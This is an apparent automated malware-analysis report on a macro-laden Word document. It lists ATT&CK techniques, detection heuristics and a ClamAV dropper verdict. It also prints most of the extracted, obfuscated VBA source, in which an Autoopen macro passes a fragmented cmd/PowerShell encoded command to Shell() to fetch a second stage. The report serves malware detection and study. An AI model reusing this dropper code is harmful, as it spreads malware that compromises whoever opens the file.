Verdict: MALICIOUS (Risk Score 242)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious OLE document containing VBA macros. Its Autoopen macro calls a function that invokes Shell() on a command assembled from obfuscated string fragments; the assembled command appears to download and execute a second-stage payload. The ClamAV detection (Doc.Dropper.Agent-6574822-0) likewise classifies the file as a dropper.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-6574822-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-6574822-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10046 bytes | 1710601405cb55628b4f25d401efb201960ca66a5ccd8250b06cfbfd37584470 |

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "wKjjNDCSzIPZR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function SljzT()
On Error Resume Next
TYZuF = Hex(rdzJFf + Hex(UPSiLs) * 68661 + Round(nBowUm))
nzSiYE = Cos(vrpmi)
cVEimz = CDate(MNIfH)
IjWkv = Cos(owpArb)
kzTap = Hex(JsRSw + Hex(MXTja) * 83910 + Round(WXwpZG))
ButnVM = Cos(fNUsm)
FwIrN = CDate(biNVR)
IEEjn = Cos(uTvXP)
SljzT = zthjv + Shell(fiZTEZv + Chr(rzYFINWIdU + vbKeyC + blFapLaXU) + aQvPhPoDb + MdBoYR + jiOWRod + ZXjoBL + zEjHZHRNrbA, 70128 - 70128)
izkGjK = Hex(ooYjYO + Hex(bzfKo) * 48128 + Round(YMHzvZ))
wSXij = Cos(NQpUC)
WdajY = CDate(Uifuok)
qWFkcH = Cos(klpVAw)
End Function
Sub Autoopen()
On Error Resume Next
ErLJLI = Hex(CzzcjT + Hex(qhDinz) * 86595 + Round(HjNNQR))
nEjZqQ = Cos(Ukcbwn)
HHsoK = CDate(EmrNzw)
kiwzr = Cos(SMttK)
SljzT
KzMSBL = Hex(FQAYU + Hex(GXfAN) * 41472 + Round(uzGqo))
kcVLOO = Cos(LzusUp)
wqAkF = CDate(YlwmLf)
khLtV = Cos(WbakFl)
End Sub
Attribute VB_Name = "mNGdnjYT"
Function aQvPhPoDb()
On Error Resume Next
znUdCo = Hex(cVAZN + Hex(fkOtD) * 65864 + Round(XZEZaU))
CPEwA = Cos(UBCBVo)
pKoXZh = CDate(RLSfY)
SVYiu = Cos(hXRMQ)
whiWX = "md nTw" + "zpWzaWd" + "Dw i" + "pEzAQ" + "bi" + "MzWzBBkCP AR"
ZfAih = Hex(YOmAN + Hex(hAtRAr) * 95221 + Round(aoOwd))
HSGYY = Cos(XVzBCn)
GGJZRH = CDate(BuJPXZ)
rblQB = Cos(NEGHO)
wCYSzhDfuVS = "jYYtlS &" + " %^c^o^m" + "^S^p^E^c^" + "% %^c^o^m" + "^S^p^E^c^% " + " /V "
QOLArO = Hex(OrSQO + Hex(rqTMJr) * 1907 + Round(iftOlB))
PBACKp = Cos(YptSAK)
XYLWT = CDate(KuszQ)
dhiRm = Cos(MawpS)
EMDjPu = " " + "/c " + " set %qslm" + "vWdDzJjzpf" + "F%=VsdsUwpUNvv" + "&&set " + "%HGnuERbpk" + "l%=p&&s"
EHASd = Hex(qqqnL + Hex(irRsb) * 40710 + Round(DlwLJ))
XGMnjM = Cos(GzSLIs)
YGZXq = CDate(bjvoU)
djOcHw = Cos(cFMiCH)
wiokaTr = "et %VFWpEGpZZl" + "ARO%=o^w&&set" + " %HzQfGO" + "zlmaLJzUw%" + "=aV" + "QRVMI&&set %IPX" + "iqToY%=!%HG" + "nuERbpkl%!&&s"
dAlYFj = Hex(EkzLZV + Hex(NoLYTk) * 67940 + Round(rULPR))
LLcXP = Cos(sbwWi)
PZvRQh = CDate(DPRBGj)
rcIQN = Cos(STsZUo)
pcNWwkhlY = "et %" + "DjQswuCRYzbVDhi" + "%=k" + "stSzKjd" + "YVs&&set %VnCTC" + "Uo" + "uN%=e^r&&se" + "t %KXhHjAp" + "pJmZ%" + "=!%V"
Gvlpo = Hex(iUKFZD + Hex(oOAuKV) * 76710 + Round(XPThJs))
wjWwc = Cos(UHdbM)
AChXi = CDate(jCDTw)
zAQij = Cos(IfzQY)
cpkdV = "FWpEGpZZlARO%!&" + "&set %" + "hpjKi" + "Gwb%=s&&set " + "%Owwia" + "vqNwpWwqjJ" + "%=" + "JYzuXwv"
idbFTH = Hex(SwFnq + Hex(slUZqO) * 55193 + Round(IzbHmb))
TjTkd = Cos(oFlii)
wfQtNZ = CDate(ojnGHB)
vafzzh = Cos(LzRmDN)
ZPVmc = "jZbuJ&&se" + "t %DrojVTM" + "iiIoGp%=he&&" + "set %fi" + "dY" + "WiQwar%=ll&&!"
DjjvHS = Hex(CsDOit + Hex(ijaLii) * 16971 + Round(ZmhAP))
jwHKMF = Cos(AEKziP)
hbkPot = CDate(TqaUfd)
GwOHDv = Cos(twEVn)
cLDWMEXjrpG = "%IPXiqToY%!!" + "%KXhHjAppJm" + "Z%!!%Vn" + "CTCUouN%!" + "!%hpjKiGwb%!!%D" + "rojVTMiiI" + "oGp%" + "!!%" + "fi"
icPMz = Hex(QjwCR + Hex(WENHh) * 79329 + Round(cvtHwr))
UWofft = Cos(rCqbO)
MNHHu = CDate(vhrJmO)
oLGkU = Cos(UTwts)
HwtwCz = "dYWiQwar%!" + " -e KABuA" + "EUAdwAtAG" + "8AQgBqAGUAQ" + "wB0ACAAU" + "wBZAFMAd" + "ABFAG" + "0A" + "LgB" + "JAG8AL"
WXLiB = Hex(jTTUP + Hex(mNAwwd) * 25497 + Round(QQFok))
WItBO = Cos(PoXYj)
pmGvv = CDate(wSwHS)
VVjrD = Cos(RXuiA)
XKCFaHbuIbk = "gBjAE8ATQBwA" + "FIARQB" + "TAHMAS" + "QBPA"
aQvPhPoDb = whiWX + wCYSzhDfuVS + EMDjPu + wiokaTr + pcNWwkhlY + cpkdV + ZPVmc + cLDWMEXjrpG + HwtwCz + XKCFaHbuIbk
End Function
Function MdBoYR()
On Error Resume Next
ZSGvY = Hex(qbMwna + Hex(UUmsSU) * 28923 + Round(VjtnYl))
GMIGm = Cos(WdMBtA)
qLYiG = CDate(ilffbO)
hDlNIA = Cos(ZUAoj)
pWQIYs = "E4AL" + "gBkAEUAR" + "gBMAEEAVABlAF" + "MAdABSAGUA" + "YQBtACgAWwB" + "zAFkAUw" + "BU" + "AE" + "UAbQAuAEkAbwA"
NwrarY = Hex(zzKHL + Hex(cDfbhj) * 85179 + Round(ASrws))
osVLkB = Cos(hjuEo)
vnhsi = CDate(bYItt)
HnmMj = Cos(bwfiF)
wfNfMK = ... (truncated)
```